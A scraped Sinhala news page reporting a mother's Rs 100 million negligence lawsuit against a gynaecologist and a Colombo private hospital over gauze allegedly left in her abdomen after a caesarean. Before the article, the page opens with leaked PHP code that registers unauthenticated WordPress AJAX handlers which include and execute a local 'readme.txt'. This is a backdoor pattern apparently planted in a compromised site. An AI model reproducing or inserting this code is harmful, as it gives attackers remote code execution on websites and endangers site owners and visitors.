if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } 23 හැවිරිදි මවක් කෝටි 10 ක් වන්දි ඉල්ලා නඩු දමයි - mediahumanrights.lk
mediahumanrights.lk
Local News News

23 හැවිරිදි මවක් කෝටි 10 ක් වන්දි ඉල්ලා නඩු දමයි

ද සෙන්ට්‍රල් වෛද්‍යවරයා සිසේරියන් සැත්කමකදී අතපසුවී උදරයේ පුළුන් ඉතිරි කර මැසුවැයි 23 හැවිරිදි මවක් කෝටි 10 ක් වන්දි ඉල්ලා නඩු දමයි.
ආසිරි රෝහල් ජාලයට අයත් කොළඹ ද සෙන්ට්‍රල් පුද්ගලික රෝහලේ සිසේරියන් සැත්කම කළ වර්ණකුලසූරිය නමැති නාරිවේද වෛද්‍යවරයා නොසැලකිල්ලෙන් තම දරු ප‍්‍රසූතියේදී පුළුන් කැබැල්ලක් උදරයට දමා මැසීයැයිද ඒ නිසා මාස ගණනාවක් විවිධ කරදර වින්දේ යයිද දන්වමින් ඊට වන්දි හැටියට රුපියල් කෝටි 10 ක මුදලක් ඉල්ලා 23 හැවිරිදි දෙදරු මවක් කොළඹ දිසා අධිකරණය හමුවේ නඩුවක් පවරා තිබේ.
නාරිවේද විශේෂඥ වෛද්‍ය සී.වර්ණකුලසූරිය මහතා සහ ද සෙන්ට්‍රල්  පෞද්ගලික රෝහල මෙහි වග උත්තර කරුවන් හැටියට නම් කර ඇත. මෙම පුළුන් කැබැල්ල ඉවත් නොකළහොත් තමන් මරණයට පත්වීමට වුවද හැකියාව තිබූ බව පැමිණිලිකාරිය එහිදී දන්වා තිබේ. ඊයේ (14 දා) කොළඹ දිසා අධිකරණය හමුවේ නඩුවක්‌ ගොනු කළ කැලණිය දළුගම  පදිංචි එම්. සී. ටී. ඩී. පෙරේරා  23 හැවිරිදි දෙදරු මව මේ අන්තරායට මුහුණපා ඇත්තේ සිය දෙවන දරු ප්‍රසූතියේදීය.
විත්තිකාර විශේෂඥ වෛද්‍යවරයාගේ උපදෙස්‌ මත 2016 ජනවාරි 3 වැනිදා රෝහලට ඇතුළත් කර එදිනම සිසේරියන් සැත්කම මගින් දරුවා ප්‍රසූත කළ බව කියන  ඇය එම සැත්කම අවසන් වී දින කිහිපයක්‌ යනතුරුම තමාගේ උදරයේ හටගත් අධික වේදනාව හා සංකූලතා පිළිබඳව වෛද්‍යවරයා දැනුවත් කිරීමට පියවර ගත් නමුත් ඔහු තමා නිසි පරීක්‍ෂාවකට ලක්‌ නොකර වේදනා නාශක පමණක්‌ ලබාදුන් බව දන්වා සිටියාය.
අනතුරුව විශේෂඥ වෛද්‍යවරයකු මාර්ගයෙන් සිදුකළ ස්‌කෑන් පරීක්‍ෂණයේදී උදරයේ පුළුන් ගුලියක්‌ හෝ ගෝස්‌ ගුලියක්‌ ඇති බවට හඳුනාගත් බවත් එයින් විමතියට පත්වූ බවත් ඇය පැමිණිල්ලේ දක්වා ඇත. 2016.04.01 වැනිදා වෙනත් පෞද්ගලික රෝහලකට ඇතුළත් වී සිදු කළ සැත්කමකදී එම පුළුන් හෝ ගෝස්‌ ගුලිය වටා ඇති වී තිබූ ගෙඩිය බඩවැලේ කොටසක්‌ ද සමඟ කපා ඉවත් කිරීමට පියවර ගන්නට පසුව සිදුවූ බව ඇය දන්වා ඇත.
එකී තුවාල යථා තත්ත්වයට පත්වනතුරු බඩවැල් උදරයෙන් පිටත රඳවා කෘතිම ක්‍රම මගින් දින 45 කට ආසන්න කාලයක්‌ තමාගේ සාමාන්‍ය ශරීර කෘත්‍යයන් පවත්වාගෙන යැමට සිදුවූ බවත් ඇය පවසයි. බඩවැල් අභ්‍යන්තර ද්‍රව්‍ය නැවත උදරය තුළට ඇතුළු කිරීම සඳහා 2016 මැයි 15 වැනිදා යළි දෙවැනි සැත්කමක්‌ කළ බවත් පළමුවන විත්තිකාර වෛද්‍යවරයාගේ නොසැලකිලිමත් ක්‍රියාව හේතුවෙන් තමාගේ ජීවිතය මාරාන්තික හා දැඩි අන්තරාදායක තත්ත්වයක පත්වූ බවත් ඒ අනුව ඇය පෙන්වා දෙයි.
අලුත උපන් දරුවාට මාස පහක අධික කාලයක්‌ යනතුරු මවුකිරි ලබාදීමට පවා මේ නිසා නොහැකි වූ බවත් ලබා දී තිබූ ඖෂධ හේතුවෙන් මවුකිරි ලබාදීම සම්පූර්ණයෙන්ම නැවැත්වීමට සිදුවීම, වෛද්‍ය පරීක්‍ෂණ හා සැත්කම් හේතුවෙන් ඉතා අධික මුදලක්‌ වැය කිරීමට එකී වෛද්‍යවරයාගේ නොසැලකිල්ල නිසා සිදු වූ බැවින් ඔහුගෙන් හා ඔහු සේවය කළ පෞද්ගලික රෝහලින් එක්‌ව හෝ වෙන් වෙන්ව එම වන්දිය ලබාදෙන ලෙස ද පැමිණිලිකාරිය ඉල්ලා ඇත.
ජීවිත අවදානමකටත් මාස පහක් තිස්සේ අනේකවිධ බරපතළ ශාරීරික හා මානසික පීඩාවන්ට ලක් කිරීමත් අතිවිශාල ධනස්කන්ධයක් වැය කිරීමට සැලැස්වීමත් සම්බන්ධයෙන් පෞද්ගලික රෝහලක ප්‍රසව හා නාරිවේද වෛද්‍ය
විශේෂඥවරයකුගෙන් රුපියල් මිලියන 100 ක වන්දියක් අවශ්‍ය බව ඒ අනුව ඇය දන්වා සිටී.

Related posts

අභියෝග මැද එළඹි නව වසර ශී‍්‍ර ලාංකිකයනුත් උණුසුම්ව පිළිගනී

Shiran Viraj

ශ්‍රී ලංකාවේ තරග සංචරයට බංග්ලාදේශය දැඩි උනන්දුවකින්

Shiran Viraj

තනි තීරණයට ප්‍රියන්ත තෝරගත්ත සකූගේ කතාවේ මාලා

Shiran Viraj